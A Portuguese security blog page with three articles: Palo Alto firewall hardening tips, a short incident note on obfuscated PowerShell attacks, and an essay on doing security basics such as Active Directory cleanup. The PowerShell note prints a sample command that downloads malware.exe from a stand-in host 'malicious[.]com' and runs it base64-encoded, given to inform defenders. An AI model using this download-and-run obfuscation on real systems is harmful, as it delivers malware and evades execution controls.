Gestão - O Diário

Vol. 1 No. 20250429-410 (2025)

Fortalecimento dos Aspectos de Segurança em Firewalls Palo Alto Networks

Giuliano Cardozo Medalha | giuliano@wztech.com.br | 29/04/2025

O fortalecimento de configurações relacionadas a segurança de acesso, dos firewalls Palo Alto Networks, requer uma abordagem multifacetada para aprimorar a postura de segurança, focando em configuração segura, controle de acesso e manutenção contínua.

As principais etapas incluem alterar senhas padrão, implementar políticas de senhas robustas, estabelecer administração baseada em papéis e limitar o acesso por meio de listas de controle de acesso (ACLs). Além disso, é crucial monitorar regularmente os logs do sistema e de configuração, manter atualizações de software e conteúdo em dia e proteger a interface de gerenciamento.

Abaixo seguem alguns tópicos considerados importantes, no sentido desse fortalecimento:

Configuração Segura e Controle de Acesso

Alterar Senhas Padrão

Nunca utilize a senha padrão de administrador. Crie senhas fortes e únicas para todas as contas administrativas, evitando senhas fáceis de adivinhar.

Habilitar Perfis e Grupos de Administradores

Restrinja o acesso com base em papéis e responsabilidades. Configure perfis administrativos para limitar o que cada administrador pode modificar, garantindo o princípio do menor privilégio.

Aplicar Políticas de Senhas Fortes

Exija senhas complexas, com combinações de letras, maiúsculas, minúsculas, números e caracteres especiais.

Implemente trocas frequentes de senhas e considere métodos de autenticação externa, como LDAP ou SAML, para maior segurança.

Perfis de Gerenciamento de Interfaces

Desative serviços desnecessários, como ping, SSH e acesso web, em interfaces que não os requerem ( principamente as interfaces que ficam expostas pra internet ).

Configure controles de acesso baseados em IP. Restrinja o acesso às interfaces de gerenciamento apenas a endereços IP específicos e VLANs autorizados.

Coloque a interface de gerenciamento em uma VLAN segura. Limite o acesso à interface de gerenciamento apenas para o pessoal ou time autorizado. Lembrar de remover perfis de autenticação, autorizações e permissões, quando um colaborador se desligar da empresa ou do ambiente.

Limitar Acesso via Listas de Controle de Acesso (ACLs)

Configure regras de firewall para restringir o fluxo de tráfego com base na origem, destino e protocolo, reduzindo a superfície de ataque.

Manutenção Contínua e Monitoramento

Manter Atualizações de Conteúdo e Software

Atualize regularmente o software e os pacotes de conteúdo do firewall para corrigir vulnerabilidades conhecidas e melhorar a proteção contra ameaças emergentes.

Configurar Notificações para Logs de Sistema e Configuração

Configure o firewall para enviar alertas sobre eventos críticos, como tentativas de login não autorizadas ou alterações de configuração.

Monitorar Logs de Sistema e Configuração

Revise regularmente os logs para identificar atividades suspeitas ou tentativas de acesso não autorizado, permitindo uma resposta rápida a incidentes.

Utilizar a Ferramenta de Avaliação de Melhores Práticas (BPA) da Palo Alto Networks

Essa ferramenta realiza verificações de segurança e fornece uma pontuação, ajudando a identificar áreas que precisam de melhorias na configuração do firewall.

Medidas Adicionais de Segurança

Usar uma String de Comunidade SNMP Forte

Caso o SNMP seja necessário, escolha uma string de comunidade única e difícil de adivinhar para evitar acessos não autorizados.

Habilitar SNMP Apenas em Interfaces Necessárias

Ative o SNMP somente em interfaces internas onde ele é estritamente necessário, reduzindo a exposição.

Considerar Autenticação Externa

Utilize métodos de autenticação robustos, como LDAP ou SAML, para reforçar a segurança das credenciais administrativas.

Proteger a Interface de Gerenciamento

A Palo Alto Networks destaca a importância de proteger a interface de gerenciamento, que é um ponto de entrada potencial para atacantes.

Implementar um Mecanismo Abrangente de Logs e Alertas

Configure logs detalhados e alertas para rastrear todos os eventos significativos, facilitando a identificação de ameaças potenciais.

Estabelecer Protocolos de Backup e Restauração

Faça backups regulares da configuração do firewall e tenha um plano claro para restauração em caso de falhas ou incidentes.

Alinhar Políticas com Padrões de Conformidade

Garanta que as configurações do firewall estejam alinhadas com padrões e regulamentações do setor, como GDPR, HIPAA ou PCI-DSS, conforme aplicável.

Submeter Firewalls a Testes Regulares

Realize testes de penetração e auditorias de segurança periódicas para identificar e corrigir vulnerabilidades.

Considerar o Uso de um Centro de Operações de Segurança (SOC)

Capacidades de SOC para monitoramento e resposta a eventos de segurança, o que pode ser uma opção para organizações com recursos limitados.

Conclusão:

Ao seguir estas diretrizes de fortalecimento, é possível melhorar significativamente a postura de segurança dos firewalls Palo Alto Networks, reduzindo o risco de acesso não autorizado e atividades maliciosas. A combinação de configuração segura, monitoramento contínuo e conformidade com melhores práticas é essencial para proteger redes corporativas contra ameaças cibernéticas em constante evolução.

Giuliano Cardozo Medalha

diario.cylo.com.br/author/giuliano-cardozo-medalha/

Vol. 1 No. 20250417-366 (2025)

Ataques obfuscados via PowerShell

Pedro Brandt Zanqueta | pedro@cylo.com.br | 17/04/2025

Lidamos recentemente com um incidente onde uma estação realizava semanalmente a execução de um script PowerShell via tarefa agendada. Isso levantou uma dúvida interessante, porque as políticas do próprio PowerShell não bloquearia, a Microsoft desenvolveu a política de execução do PowerShell, recurso de segurança ao qual controla as condições sob as quais o PowerShell carrega arquivos de configuração e executa scripts.

Analisando a cadeia de execuções, identificamos que o comando está em base64, ao que nativamente o PowerShell realiza, com isso consegue dar um bypass nessa etapa de segurança a nível de sistema operacional.

Segue abaixo um exemplo da técnica informada:

$command = “Invoke-WebRequest http[:]//malicious[.]com -OutFile malware[.]exe”

$encodedCommand = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))

powershell -EncodedCommand $encodedCommand

Essa é uma técnica entre muitas que atacantes utilizam, a pergunta que devemos fazer é, suas ferramentas e seu time estão preparados para lidar com ela?

Referências:

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.5

Pedro Brandt Zanqueta

Formado em Análise e Desenvolvimento de Sistemas na Fatec Rio Preto, comecei minha carreira com gerenciamento de infraestrutura terceirizada focado no Mercado Microsoft. Windows Server, Microsoft 365 e outros produtos da família foram o meu dia a dia por muitos anos. Como sempre focamos em manter os sistemas com os melhores processos de segurança, iniciamos os estudos para Cybersegurança. Pentest Profissional – Desec, Cursos do Cert.BR e certificações Palo Alto foram partes desse caminho, atualmente ao lado do time de SOC na CYLO temos o objetivo principal “Prevenir perdas”!

diario.cylo.com.br/author/pedro-brandt-zanqueta/

Vol. 1 No. 20250411-252 (2025)

Importância de executar o básico bem-feito

João Paulo Gonsales | jgonsales@cylo.com.br | 11/04/2025

Recentemente participei de um treinamento em Segurança da Informação, ministrado por um experiente pesquisador na área de Cybersecurity, onde diversas reflexões foram levantadas e entre elas, a importância de mensurar os investimentos na área, por onde começar? O que seria mais importante, altos investimentos em ferramental ou investir em processos?

Acredito que para diminuir a superfície de ataque do ambiente, envolve mais do que investir no melhor firewall, ferramentas de endpoint ou um bom SOC. A falta de definição de uma política de segurança da informação, um plano de recuperação de desastre funcional ou uma governança na gestão de identidade (Acessos), aumentaria muito a superfície de ataque.

Inverter a ordem no seu planejamento, seria eficaz? Talvez, depende, mas baseado nos históricos de taticas utilizadas e exploradas por atacantes no ambiente, vulnerabilidades não somente estão relacionadas a patch de segurança ou investimento em ferramental, mas também, se aplica, a inexistência das políticas e processos bem definidos e novamente, que implementadas, diminuiria a superfície de ataque a ser explorada.

Essa reflexão originada pelo treinamento, me fez lembrar de uma frase que escutei a alguns anos de um prestador de serviços de tecnologia, “Fazemos o básico bem-feito”. A fala no momento não fez muito sentido, não era o que eu estava buscando no momento, mas hoje vejo que faz muito sentido, principalmente na área de Segurança da Informação.

Fazendo uma analogia com a frase “fazer o básico bem-feito”, com a inexistência dos processos citados acima, como iremos garantir uma boa implantação do ferramental. Acredito que faria sentido complementar a frase mencionada acima para “Fazer o básico bem-feito protege melhor que fazer um avançado mal configurado”.

Um bom exemplo de “fazer o básico”, poderíamos citar o processo de gestão de acesso , por exemplo, uma sanitização recorrente do serviço de Active Directory, onde a falta de gestão em itens como, contas de computador obsoletas , contas de usuário expiradas, contas de ex-funcionários ainda ativas, excesso de contas administrativas, permissões herdadas sem lógica, falta de políticas para correções de segurança do produto , aumentaria a superfície de ataque e o risco de segurança no ambiente.

Para iniciar esse processo de gestão de acesso no serviço de Active Directory, conseguimos bons resultados com a utilização de ferramentas nativas do sistema operacional, como por exemplo o Powershell e implementação de processos bem definidos na sua gestão.

Isso seria somente alguns pontos que se aplicarmos na rotina de gestão diariamente, conseguíramos mitigar diversos riscos no ambiente e a sua não implementação, prejudica diretamente a eficácia da gestão de acesos e compromete tanto a segurança quanto a governança da TI.

Podemos citar alguns ganhos com a realização da sanitização recorrente do AD, como :

– Redução de riscos de segurança – Contas abandonadas são portas abertas para ataques. Removê-las periodicamente reduz a superfície de ataque.

– Melhoria na governança e conformidade – Facilita auditorias e garante que apenas contas ativas e justificadas existam no ambiente.

– Eficiência operacional – Um AD mais enxuto melhora a performance, reduz a carga administrativa e evita erros em permissões e acessos.

– Monitoramento contínuo e ações preventivas – Rotinas de verificação ou a implementação de Dashboards , permitiriam identificar padrões de inatividade e agir proativamente.

Seguir os processos bem definidos , usando o exemplo da utilização de scritps e ferramentas nativas, poderiamos definir que : scritps poweshell + recorrência(processos) = diminuição da superfície de ataque, segurança contínua e uma governança mais eficiente do ambiente.

Esse é somente um exemplo claro do que chamamos de “básico bem-feito” na prática, onde com poucos recursos financeiros , a gestão de acesso se torna eficiente, sem a utilização de ferramentas caras, onde fazer o básico bem feito faz a diferença e melhora a postura de segurança, alinhando muitos ganhos na segurança e conformidade.

Deixo essa reflexão, que são situações rotineiras e de muita importância do analista, definir processos, seguir processos e fazer o básico bem-feito garante uma mudança positiva no ambiente.

João Paulo Gonsales

diario.cylo.com.br/author/joao-paulo-gonsales/